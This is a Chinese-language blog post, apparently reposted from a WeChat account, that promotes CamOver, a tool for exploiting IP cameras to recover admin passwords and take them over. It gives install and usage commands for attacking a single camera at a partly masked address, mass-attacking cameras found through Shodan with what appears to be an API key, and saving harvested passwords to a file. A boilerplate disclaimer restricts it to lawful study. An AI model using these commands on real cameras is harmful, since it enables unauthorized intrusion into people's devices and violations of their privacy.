声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
关于 CamOver
-
项目地址:https://github.com/EntySec/CamOver
CamOver 是一款功能强大的摄像头漏洞利用工具,在该工具的帮助下,广大研究人员可以轻松破解掉你家网络摄像头的管理员密码,并接管你的摄像头。
功能特性
-
该工具能够发现并利用大多数主流型号网络摄像头中的安全漏洞,例如 CCTV、GoAhead 和 Netwave 等。
-
经过优化,支持多线程同时攻击多个摄像头。
-
简单的命令行接口和 API 用法。
工具安装
由于 CamOver 使用 Python3 开发,因此首先需要在本地设备上安装并配置好 Python3 环境。接下来,广大研究人员可以使用下列命令下载并安装 CamOver:
pip3 install git+https://github.com/EntySec/CamOver
基础使用
CamOver 的使用非常简单,我们只需要在命令行终端中输入 camover
命令即可使用 CamOver:
BASH
1 |
┌──(root💀kali)-[~] |
工具使用样例
攻击单个摄像头
下列命令可以攻击单个网络摄像头:
camover -a 79.xxx.xxx.237:1400
通过网络攻击远程摄像头
接下来,我们可以使用 Shodan 搜索引擎来搜索并攻击网络上的摄像头,此时我们可以使用 -t
参数来设置多线程数量以获得更好的性能:
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
随便挑一个访问:
从输入文件获取目标摄像头
我们还可以使用开放数据库中提供的摄像头地址,此时我们可以使用 -t
参数来设置多线程数量以获得更好的性能:
camover -t -i cameras.txt -o passwords.txt
此命令将会攻击 cameras.txt 中给出的所有摄像头,并会将所有获取到的密码存储至 passwords.txt 文件中。
API 使用
CamOver 还提供了自己的 Python API,可以将其导入至你们自己的项目代码中并调用其功能:
from camover import CamOver
调用样例
攻击单个摄像头:
PYTHON
1 |
from camover import CamOver |
Author: Mockingjay Link: https://whoamianony.top/2021/08/03/Others/CamOver:一款功能强大的摄像头漏洞利用工具/ Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧
原文始发于微信公众号(web安全工具库):CamOver:一款功能强大的摄像头漏洞利用工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论